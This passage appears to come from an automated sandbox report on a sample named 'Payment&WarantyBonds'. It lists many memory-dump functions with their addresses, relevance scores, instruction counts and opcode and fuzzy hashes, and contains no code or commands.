                                                                                                                                                                                • Opcode ID: ce7b208c3442cde1e3229770844ba3aa2cf001420360c60c615ae5863adafa6b
                                                                                                                                                                                • Instruction ID: 42c0115b16564218ffae22204b33fb21f9ddba7c99b8040dcf8552e6fb49303f
                                                                                                                                                                                • Opcode Fuzzy Hash: ce7b208c3442cde1e3229770844ba3aa2cf001420360c60c615ae5863adafa6b
                                                                                                                                                                                • Instruction Fuzzy Hash: B842CE71A006168FDB19CF5DC884AFEBBB2FF88315B54856ED556AB360D730E842CB90
                                                                                                                                                                                Function 0144B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fecaf930d83e7ee71a45956d321f0eadb2a05c1bcbcdc5e673bb01c913b5bf30
                                                                                                                                                                                • Instruction ID: 67b7369c2b765a25dc99b43ada5c3c40b16c4d2618b3f2dfca6555e2f309a900
                                                                                                                                                                                • Opcode Fuzzy Hash: fecaf930d83e7ee71a45956d321f0eadb2a05c1bcbcdc5e673bb01c913b5bf30
                                                                                                                                                                                • Instruction Fuzzy Hash: 2132B271E00219DBEF14DFA9D890BAEBBB5FF54714F18002EE805AB361E7359911CB91
                                                                                                                                                                                Function 014B8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
                                                                                                                                                                                • Instruction ID: f43157d889328e832e83fd7570640688f42a4e8f31c98ad93b60bccc59b4a8d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
                                                                                                                                                                                • Instruction Fuzzy Hash: 07425275A0021A8FEB25CF69C881BEEBBF9BF54300F14819AE549EB351D7349985CF60
                                                                                                                                                                                Function 014CA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85105b51c0591b042adff3455619da1ea6c849b749e42297dc36ffafa3dc0d6e
                                                                                                                                                                                • Instruction ID: a243472c79593cfba11edd7343f1792c74017f7ba5afa4c7b593ac52ad4550a3
                                                                                                                                                                                • Opcode Fuzzy Hash: 85105b51c0591b042adff3455619da1ea6c849b749e42297dc36ffafa3dc0d6e
                                                                                                                                                                                • Instruction Fuzzy Hash: 3C22BD782046698AEBA5CF29C054372BBF1AF44B04F28845FD9868F3A6F735D452DB60
                                                                                                                                                                                Function 014265D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3f8df15d2fd9e875df3fcd70706625e9198b82bebad04fedcf61aede77788c60
                                                                                                                                                                                • Instruction ID: be3380699d87574a1d4a9de0ab05f7b3ab846a2bf0bd52be4f9b4c334c7cb2f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f8df15d2fd9e875df3fcd70706625e9198b82bebad04fedcf61aede77788c60
                                                                                                                                                                                • Instruction Fuzzy Hash: 24E1B271609352CFC715CF28C090A6BBBE0FF89304F45896EE99987361DB31E946CB91
                                                                                                                                                                                Function 01418397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd5ccc479aece69a62c1d82b6c0dd72da2ec8c1134f0123b4bd62318c7f8c6ee
                                                                                                                                                                                • Instruction ID: ff61af58dc043b32d2f7c169481225b9ce073db214e163b70acf6a0d19a6bf0d
                                                                                                                                                                                • Opcode Fuzzy Hash: bd5ccc479aece69a62c1d82b6c0dd72da2ec8c1134f0123b4bd62318c7f8c6ee
                                                                                                                                                                                • Instruction Fuzzy Hash: FBD1F171A002079BDB14CF69C880BBBB7A5FF64314F04462FEA16DB2A4EB30D955CB60
                                                                                                                                                                                Function 014A8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction ID: 384a0b13611203f3e8b0952ab97a9ba2fe8e58c93aad11980f3d2f153456e35e
                                                                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                • Instruction Fuzzy Hash: 14B1B675A00606AFEB24DF55C940EBBBBB5FFA4305F91442EAE42973A0DA30E905CB10
                                                                                                                                                                                Function 0143F460 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a49209ecc0a0632c33d03ba86b3aa457b9995264faa58bf11857595d8f418331
                                                                                                                                                                                • Instruction ID: 0911bbb5d714455b7ff3bb3bae1ce8fe08b934d0224e06b455272176bd26be70
                                                                                                                                                                                • Opcode Fuzzy Hash: a49209ecc0a0632c33d03ba86b3aa457b9995264faa58bf11857595d8f418331
                                                                                                                                                                                • Instruction Fuzzy Hash: 85C15332E012218BDB25CF2CC590BBA77A1FBD8714F19416BD94A9F3B6D730890ADB51
                                                                                                                                                                                Function 01430535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction ID: b43e4c43482839ea4275f180015af1b36cf890f97c549449399e7d6ef521ee94
                                                                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 19B10871604646AFDB16DB68C850BBFBBF6AF98200F18025BE656DB3A1D730D942CB50
                                                                                                                                                                                Function 014490DB Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: df55aeca8dfd8ae0580ff8d2e6bb1c47a78b0fbf225cdd03bde0c8ea081b1868
                                                                                                                                                                                • Instruction ID: d0a9205ed05d2a65406c4a4fba540adf2ee7609531399cf3d55d4e8bea10d2b7
                                                                                                                                                                                • Opcode Fuzzy Hash: df55aeca8dfd8ae0580ff8d2e6bb1c47a78b0fbf225cdd03bde0c8ea081b1868
                                                                                                                                                                                • Instruction Fuzzy Hash: A0A14F71900216AFEB12EFA5CC41FAF7BB9AF59754F01005AFA00AB2B0D7759D11DBA0
                                                                                                                                                                                Function 014283C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                                                                                                                                • Instruction ID: aca3495a3c3f6d4f781c3e3b1930ee7824ac73d98d521d6c14820bf11254c928
                                                                                                                                                                                • Opcode Fuzzy Hash: d686f3a2f037ab38aac0c39c961fa5a31b2761911578b610ae45547775e238c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 9EC166701083418FE764DF19C484BAFB7E4BF98708F44492EE989873A1E774E949CB92
                                                                                                                                                                                Function 0144E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9e49197f93b1aef2ac257319aa74fd804aca01a96e3107e7d39d761c0b60c4fc
                                                                                                                                                                                • Instruction ID: 5cf982fd2be13364c63af923ff312b34c3453443ccf5187f88c65b1fe0e6c0da
                                                                                                                                                                                • Opcode Fuzzy Hash: 9e49197f93b1aef2ac257319aa74fd804aca01a96e3107e7d39d761c0b60c4fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 66A1F731E006159FFB22EF59C848BAEBBA4BB05724F050167EA10BB3B1D7789D45CB91
                                                                                                                                                                                Function 01460185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                                                                                                                                • Instruction ID: d760d726b2646ada2c4ce4ba5b57d56b68a7c74f595d1d526c3873aef44e9eb7
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a223a4381575135e6425d78a639324694abd7c5f3cc89090cd8bf7c01b9bf82
                                                                                                                                                                                • Instruction Fuzzy Hash: 04A1B270B016169BDB25CF69C590BAAB7B9FF54318F00402FEA05973A1EB34E812CB91
                                                                                                                                                                                Function 014F4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                                                                                                                                • Instruction ID: 795e0cf6e45645426e9e0b54d1725bed9cd8c4d9b6bf068d080e0de4370fe91c
                                                                                                                                                                                • Opcode Fuzzy Hash: 85859eb59cdf7a85a22f9c6e715e3728d6c2f771dc6d48110fe28836dd0e5e02
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BA1CC72A04212AFD712DF18C980B6BB7E9FF58714F09092EE6499B761CB74ED01CB91
                                                                                                                                                                                Function 014A60E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                                                                                                                                • Instruction ID: dfc146b99fffea5599a5aab798e895c0ccc53260ccf901b1e5b395553f18e047
                                                                                                                                                                                • Opcode Fuzzy Hash: 41ad645ef7890b8e96f4b592202e27dd1b6154baab126263b06dbb4595a11bdd
                                                                                                                                                                                • Instruction Fuzzy Hash: AD91E872D00216AFDB11DF69D890B7EBFB5AF58310F5B405AE610AB360D734D9018BA0
                                                                                                                                                                                Function 0143E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d6829ebf5eb2cab6cc902fbc0ee978c3dbab87858a674e94c55daed868891a35
                                                                                                                                                                                • Instruction ID: c84e9dccc9f8fe3511b794a9fdcc8e71f0dad9e1c5aa7bcad3d1abc3e9855f50
                                                                                                                                                                                • Opcode Fuzzy Hash: d6829ebf5eb2cab6cc902fbc0ee978c3dbab87858a674e94c55daed868891a35
                                                                                                                                                                                • Instruction Fuzzy Hash: 11910431A02616DBEB25EB59C444B7EBBA1EFEC714F05406BE905AB3A0E734D902CB51
                                                                                                                                                                                Function 01421131 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5abcdbd5d1f5bb7dbdec70c1015afdd6cebaffe603114e076b9a0d7f1fd84634
                                                                                                                                                                                • Instruction ID: 4b67ec349df71918ce6428a03b9a254703d4f551ef9a30d01d8cd440ad7fed3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5abcdbd5d1f5bb7dbdec70c1015afdd6cebaffe603114e076b9a0d7f1fd84634
                                                                                                                                                                                • Instruction Fuzzy Hash: 40B112B15083418FD355CF28C580A6ABBF1BB88704F58496EF999D7362D330E985CB52
                                                                                                                                                                                Function 014DB52F Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                • Instruction ID: 5b85569d646b3330db0cf87b9e1cf956d3b1b21a3f82ad526b8ea9b0b0e802ea
                                                                                                                                                                                • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                • Instruction Fuzzy Hash: 9C717D39A0021A9BDF10CE69C4A0ABFBBF5FF56740F5B415BE940AB261E334D9418B90
                                                                                                                                                                                Function 0144D090 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                • Instruction ID: 0ec16887f71931b6ea103fbd03bba0f054fba49fb320a2d8175497d643326b61
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                • Instruction Fuzzy Hash: AC819C72E001168BEF15EF9CC9807AEBBB2EB94314F19816BC915B73A0D6319946CB91
                                                                                                                                                                                Function 0145E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                                                                                                                                • Instruction ID: 7d5c9cedc523dd3fc931f1f107afc815c8e3b8da2a728453c3080bf35a98b880
                                                                                                                                                                                • Opcode Fuzzy Hash: d35f9af75da7e431705f40a239584bd2f71f048154d0c3f2861d5533b4e88515
                                                                                                                                                                                • Instruction Fuzzy Hash: F7817D71A00609EFDB65CFA9C880AEEFBBAFF48354F10442EE555A7221D770AD05CB60
                                                                                                                                                                                Function 014A035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction ID: 6f0add81e3ae3600b79122699f5caa60d78a0d50abbb38837cb3e0c1b4e922a3
                                                                                                                                                                                • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                • Instruction Fuzzy Hash: 21717171D00619AFDB10DFAAC984EDEBBB9FFA8700F51456AE505E7260DB34EA01CB50
                                                                                                                                                                                Function 014B62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                                                                                                                                • Instruction ID: fcc564156a1969303f5d3924874e7f3feb2f0527f9e40a24ef68425b34d502dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ab2f245ded64e8c726dbcaa5220feac9d6f6917afda6e6e4f9f7e735873e516
                                                                                                                                                                                • Instruction Fuzzy Hash: 8671F432200B01AFE732DF19C884F96BBA6EF54724F16452EE6158B2B0D779E945CB60
                                                                                                                                                                                Function 014E132D Relevance: .2, Instructions: 188COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 89dcc87fdd5ccc788312390b6980961ce2ce8e2c040e529521ec92643970d9a7
                                                                                                                                                                                • Instruction ID: 5cef5248a0fa7f13b03df759188f4d33625f7193c4448ee9787afdedd3506f54
                                                                                                                                                                                • Opcode Fuzzy Hash: 89dcc87fdd5ccc788312390b6980961ce2ce8e2c040e529521ec92643970d9a7
                                                                                                                                                                                • Instruction Fuzzy Hash: A7818F75A00205DFCB09CF59C494AAEBBF1FF58301F1581AAD859EB355D734EA41CB90
                                                                                                                                                                                Function 014E903E Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 59b5357c093f2a2abc36b046bd76d058d4cc3e51a4f9de11f1f20f9031b65e06
                                                                                                                                                                                • Instruction ID: d6956ddf237802663560069bb7e887a935acea12ead1973446c10cae470cdaaa
                                                                                                                                                                                • Opcode Fuzzy Hash: 59b5357c093f2a2abc36b046bd76d058d4cc3e51a4f9de11f1f20f9031b65e06
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D61E3B1600616AFD715CF69C888BABBBE8FF98315F00461EF959873A0DB30E515CB91
                                                                                                                                                                                Function 014E92A6 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d2a967238f106d591410b06aebfb2e711fa49726dabd8bcca6233f4b26c26933
                                                                                                                                                                                • Instruction ID: 32831374c5bca192422f3a0f67ff59e05dd955bae6c3253605fb6457f771279a
                                                                                                                                                                                • Opcode Fuzzy Hash: d2a967238f106d591410b06aebfb2e711fa49726dabd8bcca6233f4b26c26933
                                                                                                                                                                                • Instruction Fuzzy Hash: 4A612A716087428BE711CF69C458B6BBBE0FFA4309F18486EE9958B3E1D735D806C781
                                                                                                                                                                                Function 0141B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 66d772491a529f50c80be7d048e660eb7039e76462e3e50cee69dbfc3ea6c7a4
                                                                                                                                                                                • Instruction ID: 8454f67d8a77dc30578f5465f72f9086e4ca3fc75c6463ad52251eaedcc44ff9
                                                                                                                                                                                • Opcode Fuzzy Hash: 66d772491a529f50c80be7d048e660eb7039e76462e3e50cee69dbfc3ea6c7a4
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A4123316406019BD7269F2AD890B2ABBB4FF54724F11842FE9199B3B5DB709C11CB90
                                                                                                                                                                                Function 0145B570 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65c7f3ba2b3816035b083109f0dd46306bb108031799ef648eb5b4486455e901
                                                                                                                                                                                • Instruction ID: 810d5431bc47b15df1a81bcd9d72adccd6b907e4f60a84c5601aeda69e42922b
